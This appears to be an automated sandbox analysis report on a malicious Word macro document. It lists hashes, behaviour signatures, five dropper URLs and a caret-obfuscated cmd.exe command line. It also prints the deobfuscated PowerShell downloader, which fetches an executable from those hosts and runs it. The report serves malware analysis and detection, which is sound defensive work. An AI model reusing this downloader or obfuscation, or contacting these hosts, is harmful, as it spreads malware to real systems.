Analysis
-
max time kernel
147s -
max time network
156s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
-
submitted
15/06/2024, 21:40
General
-
Target
b03b9a3348c216cf0c4190606dbd49d6_JaffaCakes118.doc
-
Size
173KB
-
MD5
b03b9a3348c216cf0c4190606dbd49d6
-
SHA1
60b6ea44f9a242dd8546c715be7b02257e058344
-
SHA256
94d7531db7ab5d973048be25c1e34f6212569af85e754baa96a65be8169d3214
-
SHA512
778266ae2e4f8afd89a36fb4608838f6f2239de46f01e80927483a75d69c21881826e2619db3d855c35acdd63b862bfe6dbcb4fba1ade0568f57e7a9b27eb72d
-
SSDEEP
3072:KxjnB29gb8onPGxrPVwk5I5Pc4BG1z6/vhAnPMf:Kxyta5Pc4BGsvhAP8
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
http://siamgemsheritage.com/career_system/backoffice/uploads/RIew5i
exe.dropper
http://www.essexmarinallc.com/xLC1tT
exe.dropper
http://www.ceo.org.my/W
exe.dropper
http://www.drevostyle.com.ua/e0
exe.dropper
http://siprev.net.br/UC0
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Start PowerShell.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Suspicious behavior: AddClipboardFormatListener 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of SetWindowsHookEx 7 IoCs
-
Suspicious use of WriteProcessMemory 6 IoCs
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\b03b9a3348c216cf0c4190606dbd49d6_JaffaCakes118.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\Cmd.exeCmd ZFspqlzL BLbiBidWQwNLYFkATwFcCBi XTHCIku & %co^m^S^p^E^c% /c ^C^m^D;;; ; ^/v: ^ ;;;/^c " ;; ; (^s^e^t ^ o^C=Ci^w HZo F^wD uhr ^OJg f^r^l^ UD^1^ ^H^Wp^ l^t^Q ^M4Y ^e ^g aiR^ ^b0^U K^J1 XO^E o^k^a^ ^w^a^W^ j^ci}adN}^h^8^6{5BThBEqciak^t1^Zoa^D^6^k^cvtT}k^X^U^;^yTHk^4I2aWFu^e^yY^O^rf^q^Wb5x^T;p9TUL^0^UM^YU1k^5g^ ^$^gBZ Lav^sS^Eus^OE^A^e^FT0c^j^CAoupCr^ei^t^PizC-^ ^Y^RthZ^ard^a^w^aWmR^tK0cSG n^;^8^M4^)g^Pn^U^g^TfMLw^ykUQ^b$^tb^i ^6r^R,^Cz6o^60vr1^C^J^L^Wbr^$p6^y^(^xEwe2^ 1^lZt^Ki^xk^b^FM^FWdWM4^aF^Y^Vo^a^1^s^l^R^rSn^sjZw^fM^So^Vy^O^DhvY. d^Gr^Kt6SS7H^M^r^0v$8^J^B{^wO^7^y^P^C^F^rNDetJM^b{iv1^)^h3EF^rl^7^ZpG^A^SWM^w^$2On 3^YznFR^7^ir2m^ ^j^e^co4sv^r^Z^rnL1^2^Q$jou^(^bDnh^A^urc9^B^uaj6^X^eY^5xr3^q^5^odi^Ef^L^O^6;^sZ9'euO^e0^r^7xwE^Je ^Hz.1^2^E'Q^gH^+2^cr^t^Hq^I^jVY^F^i^M9^s$eK^6^+u^b^e^'O^0Z^\BT^J^'Nbk^+y^Jlp^t^r8^m^H^3^P^epY^G^t^Yf^s:^2^c ^vfIJnt6e^e^d^f^2$5l^X^=8^WDU^ED^S^Mc3^xkc^9^ $0t^T;^WFn'e^ V0^J7H2^0B^6^3^L^bB'7^e^0^ lFB=^H^h ^ HKPt^o^t4jMhI^i^g^kC^$8^A^F;IF^u^)C^fW'LTN^@C^o^4'^WKD^(92^7tbZS^iD68l^JYX^pY3^LSnLh.GI^k'w^ 70xsFCA^T^y^U^Ahr/^8cZrR^J^tb^U^mV.^2^uZt^4^x^8ePFon^eyx.kzA^v^p^Ja^e6^O^hrIPj^py^Zr^i^G^xL^s^b^HI/Sd^O/^UY^K:WKIp^JnktP^HJ^t^t^jo^hO^j^Q^@a^Z^w^0zfQ^eoTN^/^Mm0^a^9JCuD^RG.B^8amjl^Mot^zy^cDwG.r^xn^ed^WA^l Q^Ey^GB^f^t^L^3G^sj^AN^osX^C^vn^79eqb^prr^HI^ddm^v^.fv9^wNSQw^AB^C^w6R^C/r^b^k/^7^kb^:^3o^LpFt^Dt^e^ott^3^alhL^oJ^@^XY^FWw^Zs^/v8^0y^KvXmsV^L^.SUhg^o^K^Crxi^b^oz6H^.27m^o^a^2CeMxvcRM^z.^c4^T^wf^Qj^w3^q^Iwn^7^6/ai^K^/7^S^P:^H^AKpl^TA^t^TJ^ct^sq^P^hs^CO@KViTXnFtd^GJ1t3H^C^MYxL^0t^mx^O^ ^m/^IX7mEtj^ov^PJ^c^QEJ.C^Is^c^ScRljK^m^ly^5^d^aTP5n^l^L^ii^C^8a^rJ^T^haq^4Jm^f^jkx^yuMe^oJM^s^jV^Rs^C1xe^I^Th.^4^B^Dw^ Bvw^VL0w^dDg^/^zg^0^/sd^Z^:E^LCplp^Ut^ue7^tjq^4hoE^s@^ZTE^i^G^B^t5N^Fu^w^K^Dne0^iN^IXqe^Rl^97/rz^wsZ^X^odt^d^ea^j^D^go^FD^ll5^x^jp^i 0uR^MA^/Dxe^exB^qcNY^2i^3pjflV^U^f^F^9aotq^Uk^c^DWcA^O^Ha^M^pk^b2S^l^/WR5mZM^K^eI^5et^L^Mf^s^cT^qyHN0s^9I^B_^T6^ir^c^p^fedHG^e^8x^pr^j^v^Vak^YUcH1^A^/y^kq^m^j^i^k^o^Mk^P^c^Lf^V.fFZe^t^a^0^gGW^pa4^Kbt^2VgiF^3IrCQ^H^eqMb^hK^bQ^sbq^VmvDr^eq^ Gg^23Im^yl^XaJFOik^F^E^sF^x^B^/^C^6^ /Pk^w:M^R7^p^98ltV^zn^t^a2AhPgA^'An^S^=gaOFbm7Z^q^p7SHWR$y^gV;yB^Yt91^en^O1ce8^40i1^9el^6^Fm^Cs^Jg^bo^GS^e^wtFW^xVS.u^b^c^t ^w^Ze6h^ONqa^P ^SUvt^o9mcXDoe^A^17^jX^h^A^b5Xno^op -Vc^rwB9^z^e^a^opns^7q^=53^yrt^R^H^S^KNxMTeq$8^S^W a^K6^lGT^b^lDyfe^c^O6^h ^gx^spM0^rr45^e^tKiwT7q^o5^A6^p)&& ; ;^fOr ; ; /^l; ; ;%^4 ; ;^In ; (^ ;^+^15^83 ^-^4 3^ ^; ) ; ;D^o ;( ( ; ;; s^e^T s^Kp^r=!s^Kp^r!!o^C:~ %^4, 1!) )& ; ; ^i^F; %^4 ; ; ; ; ;; ^L^eQ ; ; ; ^3 ; ; ; (^C^a^lL ; ; %s^Kp^r:^~ ^ -39^6%) "2⤵
- Process spawned unexpected child process
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeCmD ;;; ; /v: ;;;/c " ;; ; (^s^e^t ^ o^C=Ci^w HZo F^wD uhr ^OJg f^r^l^ UD^1^ ^H^Wp^ l^t^Q ^M4Y ^e ^g aiR^ ^b0^U K^J1 XO^E o^k^a^ ^w^a^W^ j^ci}adN}^h^8^6{5BThBEqciak^t1^Zoa^D^6^k^cvtT}k^X^U^;^yTHk^4I2aWFu^e^yY^O^rf^q^Wb5x^T;p9TUL^0^UM^YU1k^5g^ ^$^gBZ Lav^sS^Eus^OE^A^e^FT0c^j^CAoupCr^ei^t^PizC-^ ^Y^RthZ^ard^a^w^aWmR^tK0cSG n^;^8^M4^)g^Pn^U^g^TfMLw^ykUQ^b$^tb^i ^6r^R,^Cz6o^60vr1^C^J^L^Wbr^$p6^y^(^xEwe2^ 1^lZt^Ki^xk^b^FM^FWdWM4^aF^Y^Vo^a^1^s^l^R^rSn^sjZw^fM^So^Vy^O^DhvY. d^Gr^Kt6SS7H^M^r^0v$8^J^B{^wO^7^y^P^C^F^rNDetJM^b{iv1^)^h3EF^rl^7^ZpG^A^SWM^w^$2On 3^YznFR^7^ir2m^ ^j^e^co4sv^r^Z^rnL1^2^Q$jou^(^bDnh^A^urc9^B^uaj6^X^eY^5xr3^q^5^odi^Ef^L^O^6;^sZ9'euO^e0^r^7xwE^Je ^Hz.1^2^E'Q^gH^+2^cr^t^Hq^I^jVY^F^i^M9^s$eK^6^+u^b^e^'O^0Z^\BT^J^'Nbk^+y^Jlp^t^r8^m^H^3^P^epY^G^t^Yf^s:^2^c ^vfIJnt6e^e^d^f^2$5l^X^=8^WDU^ED^S^Mc3^xkc^9^ $0t^T;^WFn'e^ V0^J7H2^0B^6^3^L^bB'7^e^0^ lFB=^H^h ^ HKPt^o^t4jMhI^i^g^kC^$8^A^F;IF^u^)C^fW'LTN^@C^o^4'^WKD^(92^7tbZS^iD68l^JYX^pY3^LSnLh.GI^k'w^ 70xsFCA^T^y^U^Ahr/^8cZrR^J^tb^U^mV.^2^uZt^4^x^8ePFon^eyx.kzA^v^p^Ja^e6^O^hrIPj^py^Zr^i^G^xL^s^b^HI/Sd^O/^UY^K:WKIp^JnktP^HJ^t^t^jo^hO^j^Q^@a^Z^w^0zfQ^eoTN^/^Mm0^a^9JCuD^RG.B^8amjl^Mot^zy^cDwG.r^xn^ed^WA^l Q^Ey^GB^f^t^L^3G^sj^AN^osX^C^vn^79eqb^prr^HI^ddm^v^.fv9^wNSQw^AB^C^w6R^C/r^b^k/^7^kb^:^3o^LpFt^Dt^e^ott^3^alhL^oJ^@^XY^FWw^Zs^/v8^0y^KvXmsV^L^.SUhg^o^K^Crxi^b^oz6H^.27m^o^a^2CeMxvcRM^z.^c4^T^wf^Qj^w3^q^Iwn^7^6/ai^K^/7^S^P:^H^AKpl^TA^t^TJ^ct^sq^P^hs^CO@KViTXnFtd^GJ1t3H^C^MYxL^0t^mx^O^ ^m/^IX7mEtj^ov^PJ^c^QEJ.C^Is^c^ScRljK^m^ly^5^d^aTP5n^l^L^ii^C^8a^rJ^T^haq^4Jm^f^jkx^yuMe^oJM^s^jV^Rs^C1xe^I^Th.^4^B^Dw^ Bvw^VL0w^dDg^/^zg^0^/sd^Z^:E^LCplp^Ut^ue7^tjq^4hoE^s@^ZTE^i^G^B^t5N^Fu^w^K^Dne0^iN^IXqe^Rl^97/rz^wsZ^X^odt^d^ea^j^D^go^FD^ll5^x^jp^i 0uR^MA^/Dxe^exB^qcNY^2i^3pjflV^U^f^F^9aotq^Uk^c^DWcA^O^Ha^M^pk^b2S^l^/WR5mZM^K^eI^5et^L^Mf^s^cT^qyHN0s^9I^B_^T6^ir^c^p^fedHG^e^8x^pr^j^v^Vak^YUcH1^A^/y^kq^m^j^i^k^o^Mk^P^c^Lf^V.fFZe^t^a^0^gGW^pa4^Kbt^2VgiF^3IrCQ^H^eqMb^hK^bQ^sbq^VmvDr^eq^ Gg^23Im^yl^XaJFOik^F^E^sF^x^B^/^C^6^ /Pk^w:M^R7^p^98ltV^zn^t^a2AhPgA^'An^S^=gaOFbm7Z^q^p7SHWR$y^gV;yB^Yt91^en^O1ce8^40i1^9el^6^Fm^Cs^Jg^bo^GS^e^wtFW^xVS.u^b^c^t ^w^Ze6h^ONqa^P ^SUvt^o9mcXDoe^A^17^jX^h^A^b5Xno^op -Vc^rwB9^z^e^a^opns^7q^=53^yrt^R^H^S^KNxMTeq$8^S^W a^K6^lGT^b^lDyfe^c^O6^h ^gx^spM0^rr45^e^tKiwT7q^o5^A6^p)&& ; ;^fOr ; ; /^l; ; ;%^4 ; ;^In ; (^ ;^+^15^83 ^-^4 3^ ^; ) ; ;D^o ;( ( ; ;; s^e^T s^Kp^r=!s^Kp^r!!o^C:~ %^4, 1!) )& ; ; ^i^F; %^4 ; ; ; ; ;; ^L^eQ ; ; ; ^3 ; ; ; (^C^a^lL ; ; %s^Kp^r:^~ ^ -39^6%) "3⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell $MSr=new-object Net.WebClient;$SZF='http://siamgemsheritage.com/career_system/backoffice/uploads/RIew5i@http://www.essexmarinallc.com/xLC1tT@http://www.ceo.org.my/W@http://www.drevostyle.com.ua/e0@http://siprev.net.br/UC0'.Split('@');$ijt = '320';$kMU=$env:temp+'\'+$ijt+'.exe';foreach($Lro in $SZF){try{$MSr.DownloadFile($Lro, $kMU);Start-Process $kMU;break;}catch{}}4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
4KB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
136KB